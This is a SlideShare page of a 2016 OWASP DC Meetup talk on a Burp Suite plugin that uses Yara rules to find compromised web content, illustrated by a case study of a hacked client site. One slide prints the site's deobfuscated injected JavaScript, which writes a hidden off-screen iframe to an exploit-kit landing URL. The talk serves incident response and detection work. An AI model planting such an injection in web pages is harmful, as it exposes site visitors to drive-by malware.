Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Burpsuite / Yara Integration
Ian Duffy
Polito,Inc.
@politoinc
Introduction
• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Road...
Who am I?
• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing...
Burpsuite
• Burpsuite is a MITM proxy tool for viewing,
intercepting, modifying, and transmitting
HTTP(S) requests and res...
BurpSuite
Yara
• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings,
binary / hexadecimal d...
Yara Rules Example
Case Study
• Client contacts Polito and says that their IT
department is getting phone calls stating that
their website is...
Case Study
• We request a tarball of the current webroot
folder and a dump of any backend CMS
databases
• In the meantime ...
Case Study
Highly obfuscated JavaScript – interesting…
Case Study
• The obfuscated JavaScript is consistent with
the Angler Exploit Kit, which matches the
alerts reported by our...
Case Study
Case Study
• Problems:
– How do we identify whether this EK landing page /
malicious JavaScript has been inserted into any...
Case Study
• Possible Solutions
– Wait for three days before client can get tarball of
their website uploaded to our SFTP ...
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and
Python
– Ruby requires JRuby
– Python requires J...
The Plugin…
• Burpsuite specifies several interfaces for
performing various tasks
• Depending on what functionality we are...
The Plugin…
• Each of the interfaces requires specific
methods be implemented
– IBurpExtender requires a method named
regi...
The Plugin…
• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as
much of the content as ...
Jython
• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java
objects, and call th...
Jython
• Java objects are instantiated by calling a
contructor method with the same name as
the class
– No “new” keyword l...
Demonstration
Live demo time – this always works!
Future Roadmap
• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– M...
Grab a Copy
• Plugin is available on our Github site:
• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedba...
Questions?
Ian Duffy
Polito,Inc.
@politoinc
www.politoinc.com
Thank You!
Upcoming SlideShare
Loading in …5
×

Burpsuite yara

Slides for OWASP DC Meetup - June 2016
"Identifying Compromised Web Applications with Burpsuite and Yara" by Ian Duffy

  • Be the first to comment

Burpsuite yara

  1. 1. Burpsuite / Yara Integration Ian Duffy Polito,Inc. @politoinc
  2. 2. Introduction • Who am I? • About Burpsuite and Yara • Case study: A compromised website • Plugin development • Future Roadmap • Questions
  3. 3. Who am I? • Former USAF network defender • Current cybersecurity consultant for Polito • Background in penetration testing (traditional and web application) as well as Malware analysis • Current duties involve malware analysis and threat hunting
  4. 4. Burpsuite • Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses. • Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more. • Includes several tools for assessing the security of web applications
  5. 5. BurpSuite
  6. 6. Yara • Yara is a sophisticated pattern matching tool • Specifies a language for describing strings, binary / hexadecimal data, file offset information, file structure information in order to write pattern matching rules • Rules can be run against one or many files or data streams in order to find matches
  7. 7. Yara Rules Example
  8. 8. Case Study • Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised • Polito is asked to investigate and determine: – Whether the site is actually compromised – If so, scope, scale, and impact of the compromise
  9. 9. Case Study • We request a tarball of the current webroot folder and a dump of any backend CMS databases • In the meantime we begin spidering the website using Burpsuite…
  10. 10. Case Study Highly obfuscated JavaScript – interesting…
  11. 11. Case Study • The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department • After deobfuscation of the JavaScript we see the following: document.write('<style>.ddidfodevxgsz{position:absolute;to p:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge- 19720974" width="250" height="250"></iframe></div>');
  12. 12. Case Study
  13. 13. Case Study • Problems: – How do we identify whether this EK landing page / malicious JavaScript has been inserted into any other pages on the site? – How do we identify whether the attackers have left themselves a back door?
  14. 14. Case Study • Possible Solutions – Wait for three days before client can get tarball of their website uploaded to our SFTP server – Manually search through online web content – Write something to automate our searching
  15. 15. Writing Burpsuite Plugins • Burpsuite supports plugins in Java, Ruby, and Python – Ruby requires JRuby – Python requires Jython • We decided to use Python to develop our Yara integration for expedience
  16. 16. The Plugin… • Burpsuite specifies several interfaces for performing various tasks • Depending on what functionality we are trying to implement, we must implement one or more of those interfaces • The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI
  17. 17. The Plugin… • Each of the interfaces requires specific methods be implemented – IBurpExtender requires a method named registerExtenderCallbacks – Itab requires methods named getTabCaption and getUIComponent • Documentation for the interfaces is available at: – https://portswigger.net/burp/extender/api/index.html
  18. 18. The Plugin… • Our basic use case was as follows: – Burpsuite user spiders a website to retrieve as much of the content as possible – User right-clicks on website in Burp UI and selects “Scan with Yara” – Yara is used to scan the content of the web requests and responses – Results displayed to user in a Tab
  19. 19. Jython • Jython is a hybrid between Java and Python • You can “import” Java classes, instantiate Java objects, and call their methods via Python code:
  20. 20. Jython • Java objects are instantiated by calling a contructor method with the same name as the class – No “new” keyword like in Java – Parameters to the constructors are the same • Once instantiated, class objects can be used just as with Java
  21. 21. Demonstration Live demo time – this always works!
  22. 22. Future Roadmap • Things that we are looking into: – Live Yara scanning as you surf – Persistent configuration settings – Multiple rules files • Your thoughts and feature requests are most welcome!
  23. 23. Grab a Copy • Plugin is available on our Github site: • https://github.com/PolitoInc/Yara-Scanner • Please send any feedback to ian@politoinc.com
  24. 24. Questions? Ian Duffy Polito,Inc. @politoinc www.politoinc.com Thank You!

×